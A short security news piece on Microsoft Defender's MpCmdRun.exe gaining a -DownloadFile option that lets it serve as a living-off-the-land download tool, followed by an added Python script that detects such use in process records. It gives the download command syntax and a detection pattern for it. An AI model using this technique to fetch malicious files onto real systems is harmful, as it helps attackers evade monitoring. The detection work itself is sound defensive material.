A recent update to Microsoft Defender on Windows 10 allows malware and other infected files to be downloaded to a Windows computer.
Legitimate operating system files that can be abused for malicious purposes are known as living-off-the-land binaries, or LOLBINs.
Following a recent update to Microsoft Defender, the MpCmdRun.exe command-line tool can be used to download malicious files from a remote location.
Microsoft Defender is therefore now part of the long list of Windows programs that can be used by hackers.
Microsoft Defender can be used as a LOLBIN
This feature allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location by running the following command:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
According to tests conducted by iguru.gr, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9.
The good news is that Microsoft Defender will detect malicious files that are downloaded with MpCmdRun.exe.
With this discovery, administrators now have an additional Windows executable that they need to monitor so that it is not used against them.
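One way to watch for this, as an added example that is not from the original article: a Python check that scans process-creation records for MpCmdRun.exe run with -DownloadFile and pulls out the -url and -path values for triage. The record format (image path plus command line), the function names and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any platform

# Constructed process-creation records (image path, command line); not real telemetry.
DEFENDER = r"C:\Program Files\Windows Defender\MpCmdRun.exe"
SAMPLE_EVENTS = [
    (DEFENDER, r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'),
    (DEFENDER, r"MpCmdRun.exe -DownloadFile -url https://example.test/payload.bin "
               r"-path C:\Users\Public\payload.bin"),
    (DEFENDER, r'mpcmdrun.EXE -downloadfile -URL "https://example.test/a b.bin" '
               r'-PATH "C:\Temp\a b.bin"'),
    (DEFENDER, r"MpCmdRun.exe -SignatureUpdate"),
    (r"C:\Windows\System32\notepad.exe",
     r"notepad.exe C:\notes\MpCmdRun -DownloadFile.txt"),
]


def tokenize(command_line):
    """Split on whitespace, keeping "double-quoted strings" as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def value_after(tokens, flags, name):
    """Return the argument that follows switch `name`, or None if absent."""
    if name in flags:
        i = flags.index(name) + 1
        if i < len(tokens):
            return tokens[i]
    return None


def find_defender_downloads(events):
    """Flag MpCmdRun.exe executions that use the -DownloadFile switch."""
    findings = []
    for image, command_line in events:
        if basename(image).lower() != "mpcmdrun.exe":
            continue  # only the Defender command-line utility is of interest
        tokens = tokenize(command_line)
        flags = [t.lower() for t in tokens]  # switches are matched case-insensitively
        if "-downloadfile" not in flags:
            continue  # routine use such as -Scan or -SignatureUpdate
        findings.append({"image": image,
                         "url": value_after(tokens, flags, "-url"),
                         "path": value_after(tokens, flags, "-path")})
    return findings


if __name__ == "__main__":
    for hit in find_defender_downloads(SAMPLE_EVENTS):
        print(hit)
```

The same matching logic can be applied to whatever process-creation source is already collected, with each event mapped to an image path and command line first.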